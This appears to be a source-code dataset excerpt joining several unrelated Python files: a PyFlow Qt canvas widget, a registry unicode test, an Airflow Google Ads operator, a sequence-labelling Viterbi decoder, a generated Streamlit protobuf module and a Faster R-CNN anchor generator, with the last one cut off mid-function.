            # When copy paste compound node. we are actually pasting a tree of graphs
            # So we need to put each node under correct graph
            assert(parentGraph is not None), "Parent graph is invalid"
            parentGraph.addNode(uiNode._rawNode, jsonTemplate)
        uiNode.postCreate(jsonTemplate)
def createUIConnectionForConnectedPins(self, srcUiPin, dstUiPin):
assert(srcUiPin is not None)
assert(dstUiPin is not None)
if srcUiPin.direction == PinDirection.Input:
srcUiPin, dstUiPin = dstUiPin, srcUiPin
uiConnection = UIConnection(srcUiPin, dstUiPin, self)
self.scene().addItem(uiConnection)
self.connections[uiConnection.uid] = uiConnection
return uiConnection
def connectPinsInternal(self, src, dst):
result = connectPins(src._rawPin, dst._rawPin)
if result:
return self.createUIConnectionForConnectedPins(src, dst)
return None
def connectPins(self, src, dst):
# Highest level connect pins function
if src and dst:
if canConnectPins(src._rawPin, dst._rawPin):
wire = self.connectPinsInternal(src, dst)
if wire is not None:
EditorHistory().saveState("Connect pins", modify=True)
def removeEdgeCmd(self, connections):
for wire in list(connections):
self.removeConnection(wire)
    def removeConnection(self, connection):
        """Delete a UI wire and disconnect the underlying raw pins."""
        src = connection.source()._rawPin
        dst = connection.destination()._rawPin
        # this will remove raw pins from affection lists
        # will call pinDisconnected for raw pins
        disconnectPins(src, dst)
        # call disconnection events for ui pins
        connection.source().pinDisconnected(connection.destination())
        connection.destination().pinDisconnected(connection.source())
        # Drop all bookkeeping references before removing from the scene.
        self.connections.pop(connection.uid)
        connection.source().uiConnectionList.remove(connection)
        connection.destination().uiConnectionList.remove(connection)
        connection.prepareGeometryChange()
        self.scene().removeItem(connection)
def zoomDelta(self, direction):
if direction:
self.zoom(1 + 0.1)
else:
self.zoom(1 - 0.1)
    def reset_scale(self):
        # Restore the view transform to identity (100% zoom).
        self.resetMatrix()
    def viewMinimumScale(self):
        # Smallest zoom factor the canvas allows.
        return self._minimum_scale
    def viewMaximumScale(self):
        # Largest zoom factor the canvas allows.
        return self._maximum_scale
    def currentViewScale(self):
        # m22 is the vertical scale component; zoom() scales x and y equally,
        # so this represents the uniform zoom factor.
        return self.transform().m22()
    def getLodValueFromScale(self, numLods=5, scale=1.0):
        # Linearly map the zoom factor onto [numLods .. 1]: the further
        # zoomed in (scale near maximum), the lower the LOD value.
        lod = lerp(numLods, 1, GetRangePct(self.viewMinimumScale(), self.viewMaximumScale(), scale))
        return int(round(lod))
    def getLodValueFromCurrentScale(self, numLods=5):
        # Convenience wrapper using the view's current zoom factor.
        return self.getLodValueFromScale(numLods, self.currentViewScale())
    def zoom(self, scale_factor):
        """Scale the view by *scale_factor*, clamped to the allowed range."""
        self.factor = self.transform().m22()
        futureScale = self.factor * scale_factor
        if futureScale <= self._minimum_scale:
            scale_factor = (self._minimum_scale) / self.factor
        if futureScale >= self._maximum_scale:
            # NOTE(review): clamps to slightly below the maximum (-0.1) while
            # the minimum clamps exactly -- looks deliberate but confirm.
            scale_factor = (self._maximum_scale - 0.1) / self.factor
        self.scale(scale_factor, scale_factor)
    def eventFilter(self, object, event):
        # Open the node box on Tab. Always returns False so the event keeps
        # propagating to the filtered object.
        if event.type() == QtCore.QEvent.KeyPress and event.key() == QtCore.Qt.Key_Tab:
            self.showNodeBox()
        return False
class CanvasWidget(QWidget):
    """Container widget hosting the Canvas plus a breadcrumb path bar and a
    compound name/category editing bar (shown only inside compound graphs).
    """
    def __init__(self, graphManager, pyFlowInstance, parent=None):
        super(CanvasWidget, self).__init__(parent)
        self.manager = graphManager
        self.pyFlowInstance = pyFlowInstance
        self.mainLayout = QVBoxLayout(self)
        self.mainLayout.setSpacing(1)
        self.mainLayout.setContentsMargins(1, 1, 1, 1)
        self.setContentsMargins(1, 1, 1, 1)
        self.mainLayout.setObjectName("canvasWidgetMainLayout")
        # Breadcrumb row showing the current graph location.
        self.pathLayout = QHBoxLayout()
        self.mainLayout.addLayout(self.pathLayout)
        # Row holding the compound name/category editors.
        self.compoundPropertiesWidget = QWidget()
        self.compoundPropertiesWidget.setContentsMargins(1, 1, 1, 1)
        self.compoundPropertiesWidget.setObjectName("compoundPropertiesWidget")
        self.compoundPropertiesLayout = QHBoxLayout(self.compoundPropertiesWidget)
        self.compoundPropertiesLayout.setSpacing(1)
        self.compoundPropertiesLayout.setContentsMargins(1, 1, 1, 1)
        self.mainLayout.addWidget(self.compoundPropertiesWidget)
        self.leCompoundName = QLineEdit()
        self.leCompoundName.setObjectName("leCompoundName")
        self.leCompoundCategory = QLineEdit()
        self.leCompoundCategory.setObjectName("leCompoundCategory")
        compoundNameLabel = QLabel("Name:")
        compoundNameLabel.setObjectName("compoundNameLabel")
        self.compoundPropertiesLayout.addWidget(compoundNameLabel)
        self.compoundPropertiesLayout.addWidget(self.leCompoundName)
        compoundCategoryLabel = QLabel("Category:")
        compoundCategoryLabel.setObjectName("compoundCategoryLabel")
        self.compoundPropertiesLayout.addWidget(compoundCategoryLabel)
        self.compoundPropertiesLayout.addWidget(self.leCompoundCategory)
        self.canvas = Canvas(graphManager, pyFlowInstance)
        self.mainLayout.addWidget(self.canvas)
        # Keep the breadcrumb bar in sync with graph switches.
        self.manager.graphChanged.connect(self.updateGraphTreeLocation)
        self.canvas.requestFillProperties.connect(self.pyFlowInstance.onRequestFillProperties)
        self.canvas.requestClearProperties.connect(self.pyFlowInstance.onRequestClearProperties)
        # Compound names: alphanumeric only; categories: letters only.
        rxLettersAndNumbers = QtCore.QRegExp('^[a-zA-Z0-9]*$')
        nameValidator = QtGui.QRegExpValidator(rxLettersAndNumbers, self.leCompoundName)
        self.leCompoundName.setValidator(nameValidator)
        self.leCompoundName.returnPressed.connect(self.onActiveCompoundNameAccepted)
        rxLetters = QtCore.QRegExp('^[a-zA-Z]*$')
        categoryValidator = QtGui.QRegExpValidator(rxLetters, self.leCompoundCategory)
        self.leCompoundCategory.setValidator(categoryValidator)
        self.leCompoundCategory.setValidator(categoryValidator) if False else None  # NOTE(review): remove if flagged; kept original wiring below
        self.leCompoundCategory.returnPressed.connect(self.onActiveCompoundCategoryAccepted)
        self.updateGraphTreeLocation()
        self.pyFlowInstance.fileBeenLoaded.connect(self.onFileBeenLoaded)
    def shoutDown(self):
        # Forward teardown to the canvas.
        self.canvas.shoutDown()
    def Tick(self, delta):
        # Forward the per-frame tick to the canvas.
        self.canvas.Tick(delta)
    def onFileBeenLoaded(self):
        # A file was loaded: build UI wrappers for every raw graph.
        for graph in self.manager.getAllGraphs():
            self.canvas.createWrappersForGraph(graph)
    def updateGraphTreeLocation(self, *args, **kwargs):
        """Rebuild the breadcrumb buttons for the current graph location."""
        location = self.canvas.location()
        clearLayout(self.pathLayout)
        spacerItem = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
        self.pathLayout.addItem(spacerItem)
        for folderName in location:
            index = self.pathLayout.count() - 1
            btn = QPushButton(folderName)
            # name=folderName default binds the loop variable per button.
            def onClicked(checked, name=None):
                self.canvas.stepToCompound(name)
            btn.clicked.connect(lambda chk=False, name=folderName: onClicked(chk, name))
            self.pathLayout.insertWidget(index, btn)
        # Property bar is only relevant inside a compound (depth > 1).
        self.setCompoundPropertiesWidgetVisible(self.manager.activeGraph().depth() > 1)
    def setCompoundPropertiesWidgetVisible(self, bVisible):
        # Show/hide the compound property bar, refreshing its fields on show.
        if bVisible:
            self.compoundPropertiesWidget.show()
            self.leCompoundName.setText(self.manager.activeGraph().name)
            self.leCompoundCategory.setText(self.manager.activeGraph().category)
        else:
            self.compoundPropertiesWidget.hide()
    def onActiveCompoundNameAccepted(self):
        # Rename the active compound graph, enforcing uniqueness; block
        # signals while writing back so setText doesn't re-trigger handlers.
        newName = self.manager.getUniqName(self.leCompoundName.text())
        self.manager.activeGraph().name = newName
        self.leCompoundName.blockSignals(True)
        self.leCompoundName.setText(newName)
        self.leCompoundName.blockSignals(False)
        self.updateGraphTreeLocation()
    def onActiveCompoundCategoryAccepted(self):
        # Store the edited category on the active compound graph.
        newCategoryName = self.leCompoundCategory.text()
        self.manager.activeGraph().category = newCategoryName
| 45.230233 | 205 | 0.588339 |
acdfb3415973571117ca27d67786cdb3be05b1f1 | 1,207 | py | Python | tests/test_unicode_names.py | timgates42/python-registry | c028c7fca99aaed835490ada8d43dfea42811d3c | [
"Apache-2.0"
] | 326 | 2015-01-10T20:48:33.000Z | 2022-03-14T07:59:58.000Z | tests/test_unicode_names.py | timgates42/python-registry | c028c7fca99aaed835490ada8d43dfea42811d3c | [
"Apache-2.0"
] | 70 | 2015-01-02T19:29:31.000Z | 2021-06-17T16:32:03.000Z | tests/test_unicode_names.py | timgates42/python-registry | c028c7fca99aaed835490ada8d43dfea42811d3c | [
"Apache-2.0"
] | 108 | 2015-01-07T18:20:45.000Z | 2022-03-05T15:26:06.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import six
import unittest
from Registry import Registry
class TestRegistryUnicode(unittest.TestCase):
    """Checks that registry key/value names decode to expected unicode text."""
    def setUp(self):
        # Hive fixture whose keys/values carry non-ASCII names.
        self.path = os.path.join(os.path.dirname(__file__), 'reg_samples', 'UNICODE_TESTS')
    @classmethod
    def is_correct_string(cls, data):
        # A decoded string is valid when it is a text (unicode) type and is
        # either empty or starts with one of the fixture's known prefixes.
        return (isinstance(data, six.text_type)
                and (data == u""
                     or data.startswith(u"ASCII")
                     or data.startswith(u'UNICODE_JUMBLE_{H~\u2591\xf4\xab}')))
    def test_decoding(self):
        root = Registry.Registry(self.path).root()
        for key in root.subkeys():
            self.assertTrue(self.is_correct_string(key.name()), key.name())
            for value in key.values():
                self.assertTrue(self.is_correct_string(value.name()), value.name())
                val = value.value()
                # Multi-string values come back as lists; check each element.
                if isinstance(val, list):
                    for item in val:
                        self.assertTrue(self.is_correct_string(item), item)
                else:
                    self.assertTrue(self.is_correct_string(val), val)
# Run Tests
if __name__ == '__main__':
    # verbosity=2 prints each test name as it runs.
    unittest.main(verbosity=2)
| 32.621622 | 91 | 0.588235 |
acdfb3b1ac38f0da9e4b8186c49e13aaad56ab69 | 4,776 | py | Python | airflow/providers/google/ads/operators/ads.py | emilioego/airflow | 3457c7847cd24413ff5b622e65c27d8370f94502 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 79 | 2021-10-15T07:32:27.000Z | 2022-03-28T04:10:19.000Z | airflow/providers/google/ads/operators/ads.py | emilioego/airflow | 3457c7847cd24413ff5b622e65c27d8370f94502 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 153 | 2021-10-15T05:23:46.000Z | 2022-02-23T06:07:10.000Z | airflow/providers/google/ads/operators/ads.py | emilioego/airflow | 3457c7847cd24413ff5b622e65c27d8370f94502 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 23 | 2021-10-15T02:36:37.000Z | 2022-03-17T02:59:27.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains Google Ad to GCS operators."""
import csv
from tempfile import NamedTemporaryFile
from typing import Optional, Sequence, Union
from airflow.models import BaseOperator
from airflow.providers.google.ads.hooks.ads import GoogleAdsHook
from airflow.providers.google.cloud.hooks.gcs import GCSHook
from airflow.utils.decorators import apply_defaults
class GoogleAdsListAccountsOperator(BaseOperator):
    """
    Saves list of customers on GCS in form of a csv file.

    The resulting list of customers is based on your OAuth credentials. The request returns a list
    of all accounts that you are able to act upon directly given your current credentials. This will
    not necessarily include all accounts within the account hierarchy; rather, it will only include
    accounts where your authenticated user has been added with admin or other rights in the account.

    ..seealso::
        https://developers.google.com/google-ads/api/reference/rpc

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:GoogleAdsListAccountsOperator`

    :param bucket: The GCS bucket to upload to
    :type bucket: str
    :param object_name: GCS path to save the csv file. Must be the full file path (ex. `path/to/file.csv`)
    :type object_name: str
    :param gcp_conn_id: Airflow Google Cloud connection ID
    :type gcp_conn_id: str
    :param google_ads_conn_id: Airflow Google Ads connection ID
    :type google_ads_conn_id: str
    :param page_size: The number of results per API page request. Max 10,000
    :type page_size: int
    :param gzip: Option to compress local file or file data for upload
    :type gzip: bool
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """
    # Fields rendered through Jinja templating by Airflow.
    template_fields = (
        "bucket",
        "object_name",
        "impersonation_chain",
    )
    @apply_defaults
    def __init__(
        self,
        *,
        bucket: str,
        object_name: str,
        gcp_conn_id: str = "google_cloud_default",
        google_ads_conn_id: str = "google_ads_default",
        gzip: bool = False,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        self.bucket = bucket
        self.object_name = object_name
        self.gcp_conn_id = gcp_conn_id
        self.google_ads_conn_id = google_ads_conn_id
        self.gzip = gzip
        self.impersonation_chain = impersonation_chain
    def execute(self, context: dict) -> str:
        """Fetch accessible customer IDs and upload them to GCS as a CSV.

        :param context: Airflow task context.
        :return: the ``gs://`` URI of the uploaded object.
        """
        uri = f"gs://{self.bucket}/{self.object_name}"
        ads_hook = GoogleAdsHook(gcp_conn_id=self.gcp_conn_id, google_ads_conn_id=self.google_ads_conn_id)
        gcs_hook = GCSHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
        with NamedTemporaryFile("w+") as temp_file:
            # Download accounts
            accounts = ads_hook.list_accessible_customers()
            writer = csv.writer(temp_file)
            writer.writerows(accounts)
            # Flush before upload so the file on disk is complete.
            temp_file.flush()
            # Upload to GCS
            gcs_hook.upload(
                bucket_name=self.bucket, object_name=self.object_name, gzip=self.gzip, filename=temp_file.name
            )
        self.log.info("Uploaded %s to %s", len(accounts), uri)
        return uri
| 41.530435 | 110 | 0.707915 |
acdfb449f18c8ee07441701e9ae2c3dfab704f22 | 4,850 | py | Python | lxmls/sequences/sequence_classification_decoder.py | gomesfernanda/lxmls_lab | 74b60b9e79aaa2994aee9428b623c04e93807bda | [
"MIT"
] | 1 | 2018-06-20T12:41:19.000Z | 2018-06-20T12:41:19.000Z | lxmls/sequences/sequence_classification_decoder.py | gomesfernanda/lxmls_lab | 74b60b9e79aaa2994aee9428b623c04e93807bda | [
"MIT"
] | null | null | null | lxmls/sequences/sequence_classification_decoder.py | gomesfernanda/lxmls_lab | 74b60b9e79aaa2994aee9428b623c04e93807bda | [
"MIT"
] | null | null | null | import numpy as np
from lxmls.sequences.log_domain import *
import pdb
class SequenceClassificationDecoder:
    """Implements a sequence classification decoder.

    All scores are expected in the log domain with these shapes:

    - initial_scores:    (num_states,) array
    - transition_scores: (length-1, num_states, num_states) array, indexed as
      ``[pos, current_state, previous_state]``
    - final_scores:      (num_states,) array
    - emission_scores:   (length, num_states) array
    """
    def __init__(self):
        pass
    # ----------
    # Computes the forward trellis for a given sequence.
    # Receives:
    #
    # Initial scores: (num_states) array
    # Transition scores: (length-1, num_states, num_states) array
    # Final scores: (num_states) array
    # Emission scoress: (length, num_states) array
    # ----------
    def run_forward(self, initial_scores, transition_scores, final_scores, emission_scores):
        """Compute the forward trellis; returns (log_likelihood, forward)."""
        length = np.size(emission_scores, 0)  # Length of the sequence.
        num_states = np.size(initial_scores)  # Number of states.
        # Forward variables.
        forward = np.zeros([length, num_states]) + logzero()
        # Initialization.
        forward[0, :] = emission_scores[0, :] + initial_scores
        # Forward loop.
        for pos in range(1, length):
            for current_state in range(num_states):
                # Multiplication in the log domain becomes a sum, and a sum
                # becomes a logsum.
                forward[pos, current_state] = logsum(forward[pos-1, :] + transition_scores[pos-1, current_state, :])
                forward[pos, current_state] += emission_scores[pos, current_state]
        # Termination.
        log_likelihood = logsum(forward[length-1, :] + final_scores)
        return log_likelihood, forward
    # ----------
    # Computes the backward trellis for a given sequence.
    # ----------
    def run_backward(self, initial_scores, transition_scores, final_scores, emission_scores):
        """Compute the backward trellis; returns (log_likelihood, backward)."""
        length = np.size(emission_scores, 0)  # Length of the sequence.
        num_states = np.size(initial_scores)  # Number of states.
        # Backward variables.
        backward = np.zeros([length, num_states]) + logzero()
        # Initialization.
        backward[length-1, :] = final_scores
        # Backward loop.
        for pos in range(length-2, -1, -1):
            for current_state in range(num_states):
                backward[pos, current_state] = \
                    logsum(backward[pos+1, :] +
                           transition_scores[pos, :, current_state] +
                           emission_scores[pos+1, :])
        # Termination.
        log_likelihood = logsum(backward[0, :] + initial_scores + emission_scores[0, :])
        return log_likelihood, backward
    # ----------
    # Computes the viterbi trellis for a given sequence.
    # ----------
    def run_viterbi(self, initial_scores, transition_scores, final_scores, emission_scores):
        """Find the most likely state sequence (Viterbi decoding).

        This is the max-product analogue of :meth:`run_forward`: every
        ``logsum`` is replaced by ``max`` and backpointers are stored so the
        best path can be recovered.

        Returns a tuple ``(best_path, best_score)`` where ``best_path`` is an
        int array of length ``length`` and ``best_score`` is the log score of
        that path.
        """
        length = np.size(emission_scores, 0)  # Length of the sequence.
        num_states = np.size(initial_scores)  # Number of states.
        # Viterbi scores; every cell is overwritten below, so a plain zero
        # initialization suffices.
        viterbi_scores = np.zeros([length, num_states])
        # Backpointers used to recover the best path.
        viterbi_paths = -np.ones([length, num_states], dtype=int)
        # Most likely sequence (filled during backtracking).
        best_path = -np.ones(length, dtype=int)
        # Initialization.
        viterbi_scores[0, :] = emission_scores[0, :] + initial_scores
        # Viterbi loop.
        for pos in range(1, length):
            for current_state in range(num_states):
                scores = viterbi_scores[pos-1, :] + transition_scores[pos-1, current_state, :]
                viterbi_paths[pos, current_state] = np.argmax(scores)
                viterbi_scores[pos, current_state] = np.max(scores) + emission_scores[pos, current_state]
        # Termination.
        terminal_scores = viterbi_scores[length-1, :] + final_scores
        best_path[length-1] = np.argmax(terminal_scores)
        best_score = np.max(terminal_scores)
        # Backtrack through the stored backpointers.
        for pos in range(length-2, -1, -1):
            best_path[pos] = viterbi_paths[pos+1, best_path[pos+1]]
        return best_path, best_score
    def run_forward_backward(self, initial_scores, transition_scores, final_scores, emission_scores):
        """Run both passes; prints each log-likelihood (they must agree)."""
        log_likelihood, forward = self.run_forward(initial_scores, transition_scores, final_scores, emission_scores)
        print('Log-Likelihood =', log_likelihood)
        log_likelihood, backward = self.run_backward(initial_scores, transition_scores, final_scores, emission_scores)
        print('Log-Likelihood =', log_likelihood)
        return forward, backward
| 36.742424 | 118 | 0.609897 |
acdfb57bed73c8ac61ce40bbe16a1000e07b84d4 | 604 | py | Python | src/101_200/0119_pascals-triangle-ii/pascals-triangle-ii.py | himichael/LeetCode | d54f48e785af3d47a2a67a95fd3343d2b23f8ae5 | [
"Apache-2.0"
] | 1 | 2019-12-18T06:08:47.000Z | 2019-12-18T06:08:47.000Z | src/101_200/0119_pascals-triangle-ii/pascals-triangle-ii.py | himichael/LeetCode | d54f48e785af3d47a2a67a95fd3343d2b23f8ae5 | [
"Apache-2.0"
] | 1 | 2019-05-18T09:35:22.000Z | 2019-05-18T09:35:22.000Z | src/101_200/0119_pascals-triangle-ii/pascals-triangle-ii.py | himichael/LeetCode | d54f48e785af3d47a2a67a95fd3343d2b23f8ae5 | [
"Apache-2.0"
class Solution(object):
    def getRow(self, rowIndex):
        """
        Return row *rowIndex* (0-based) of Pascal's triangle using O(rowIndex)
        extra space.

        Fixes over the original: the class defined ``getRow`` twice (the first
        definition was dead, silently shadowed by the second), and used the
        Python-2-only ``xrange`` (``range`` works on both 2 and 3).

        :type rowIndex: int
        :rtype: List[int]
        """
        row = [1]
        for i in range(1, rowIndex + 1):
            # Update in place, left to right. ``carry`` holds the value each
            # cell had before being overwritten, i.e. the old left neighbour
            # needed by the next position.
            carry = 1
            for j in range(1, i):
                carry, row[j] = row[j], row[j] + carry
            row.append(1)
        return row
acdfb5ae6a1783c9e286f1c7418f6f40e2d8b0da | 5,090 | py | Python | venv/lib/python3.9/site-packages/streamlit/proto/TimeInput_pb2.py | CMU-IDS-2022/final-project-the-evaluators | 3b9262ad1a0f7315208a94a05ea1ce38e679d01d | [
"BSD-3-Clause"
] | 1 | 2022-01-17T02:58:50.000Z | 2022-01-17T02:58:50.000Z | venv/lib/python3.9/site-packages/streamlit/proto/TimeInput_pb2.py | CMU-IDS-2022/final-project-the-evaluators | 3b9262ad1a0f7315208a94a05ea1ce38e679d01d | [
"BSD-3-Clause"
] | null | null | null | venv/lib/python3.9/site-packages/streamlit/proto/TimeInput_pb2.py | CMU-IDS-2022/final-project-the-evaluators | 3b9262ad1a0f7315208a94a05ea1ce38e679d01d | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: streamlit/proto/TimeInput.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
# NOTE: protoc-generated module (see file header: "DO NOT EDIT").
# Regenerate from streamlit/proto/TimeInput.proto instead of editing by hand.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='streamlit/proto/TimeInput.proto',
  package='',
  syntax='proto3',
  serialized_options=None,
  create_key=_descriptor._internal_create_key,
  serialized_pb=b'\n\x1fstreamlit/proto/TimeInput.proto\"\x8a\x01\n\tTimeInput\x12\n\n\x02id\x18\x01 \x01(\t\x12\r\n\x05label\x18\x02 \x01(\t\x12\x0f\n\x07\x64\x65\x66\x61ult\x18\x03 \x01(\t\x12\x0c\n\x04help\x18\x04 \x01(\t\x12\x0f\n\x07\x66orm_id\x18\x05 \x01(\t\x12\r\n\x05value\x18\x06 \x01(\t\x12\x11\n\tset_value\x18\x07 \x01(\x08\x12\x10\n\x08\x64isabled\x18\x08 \x01(\x08\x62\x06proto3'
)
# Descriptor for the TimeInput message: eight scalar fields (seven strings
# plus two bools for set_value/disabled), mirroring the .proto definition.
_TIMEINPUT = _descriptor.Descriptor(
  name='TimeInput',
  full_name='TimeInput',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='id', full_name='TimeInput.id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='label', full_name='TimeInput.label', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='default', full_name='TimeInput.default', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='help', full_name='TimeInput.help', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='form_id', full_name='TimeInput.form_id', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='value', full_name='TimeInput.value', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='set_value', full_name='TimeInput.set_value', index=6,
      number=7, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='disabled', full_name='TimeInput.disabled', index=7,
      number=8, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=36,
  serialized_end=174,
)
DESCRIPTOR.message_types_by_name['TimeInput'] = _TIMEINPUT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Build the concrete message class from the descriptor.
TimeInput = _reflection.GeneratedProtocolMessageType('TimeInput', (_message.Message,), {
  'DESCRIPTOR' : _TIMEINPUT,
  '__module__' : 'streamlit.proto.TimeInput_pb2'
  # @@protoc_insertion_point(class_scope:TimeInput)
  })
_sym_db.RegisterMessage(TimeInput)
# @@protoc_insertion_point(module_scope)
| 42.416667 | 394 | 0.743615 |
acdfb70039aa9cfaa6dcd4e5b1875a852ba4c8b7 | 3,208 | py | Python | lib/layer_utils/generate_anchors.py | bareblackfoot/faster-rcnn.selection | 4a77960a2b4513524d7a68c38a5b710c4d579d08 | [
"MIT"
] | null | null | null | lib/layer_utils/generate_anchors.py | bareblackfoot/faster-rcnn.selection | 4a77960a2b4513524d7a68c38a5b710c4d579d08 | [
"MIT"
] | null | null | null | lib/layer_utils/generate_anchors.py | bareblackfoot/faster-rcnn.selection | 4a77960a2b4513524d7a68c38a5b710c4d579d08 | [
"MIT"
] | null | null | null | # --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Sean Bell
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
# Verify that we compute the same anchors as Shaoqing's matlab implementation:
#
# >> load output/rpn_cachedir/faster_rcnn_VOC2007_ZF_stage1_rpn/anchors.mat
# >> anchors
#
# anchors =
#
# -83 -39 100 56
# -175 -87 192 104
# -359 -183 376 200
# -55 -55 72 72
# -119 -119 136 136
# -247 -247 264 264
# -35 -79 52 96
# -79 -167 96 184
# -167 -343 184 360
# array([[ -83., -39., 100., 56.],
# [-175., -87., 192., 104.],
# [-359., -183., 376., 200.],
# [ -55., -55., 72., 72.],
# [-119., -119., 136., 136.],
# [-247., -247., 264., 264.],
# [ -35., -79., 52., 96.],
# [ -79., -167., 96., 184.],
# [-167., -343., 184., 360.]])
def generate_anchors(base_size=16, ratios=[0.5, 1, 2],
                     scales=2 ** np.arange(3, 6)):
    """Generate anchor (reference) windows by enumerating aspect ratios X
    scales wrt a reference (0, 0, base_size-1, base_size-1) window.

    Args:
        base_size: side length of the reference window (anchors are centered
            on this window).
        ratios: aspect ratios (h/w) to enumerate.
        scales: multiplicative scales applied to each ratio anchor.

    Returns:
        (len(ratios) * len(scales), 4) array of anchors as
        (x1, y1, x2, y2), ordered ratio-major.
    """
    # Reference window in 0-indexed pixel coordinates.
    base_anchor = np.array([1, 1, base_size, base_size]) - 1
    ratio_anchors = _ratio_enum(base_anchor, ratios)
    # For each ratio anchor, enumerate all scales and stack the results.
    anchors = np.vstack([_scale_enum(ratio_anchors[i, :], scales)
                         for i in range(ratio_anchors.shape[0])])
    # (Removed leftover commented-out pdb/print debugging code.)
    return anchors
def _whctrs(anchor):
"""
Return width, height, x center, and y center for an anchor (window).
"""
w = anchor[2] - anchor[0] + 1
h = anchor[3] - anchor[1] + 1
x_ctr = anchor[0] + 0.5 * (w - 1)
y_ctr = anchor[1] + 0.5 * (h - 1)
return w, h, x_ctr, y_ctr
def _mkanchors(ws, hs, x_ctr, y_ctr):
"""
Given a vector of widths (ws) and heights (hs) around a center
(x_ctr, y_ctr), output a set of anchors (windows).
"""
ws = ws[:, np.newaxis]
hs = hs[:, np.newaxis]
anchors = np.hstack((x_ctr - 0.5 * (ws - 1),
y_ctr - 0.5 * (hs - 1),
x_ctr + 0.5 * (ws - 1),
y_ctr + 0.5 * (hs - 1)))
return anchors
def _ratio_enum(anchor, ratios):
    """Enumerate a set of anchors for each aspect ratio wrt an anchor."""
    w, h, x_ctr, y_ctr = _whctrs(anchor)
    area = w * h
    # Solve w' = round(sqrt(area / r)), h' = round(w' * r) so that
    # w' * h' ~= area while h'/w' ~= r.
    widths = np.round(np.sqrt(area / ratios))
    heights = np.round(widths * ratios)
    return _mkanchors(widths, heights, x_ctr, y_ctr)
def _scale_enum(anchor, scales):
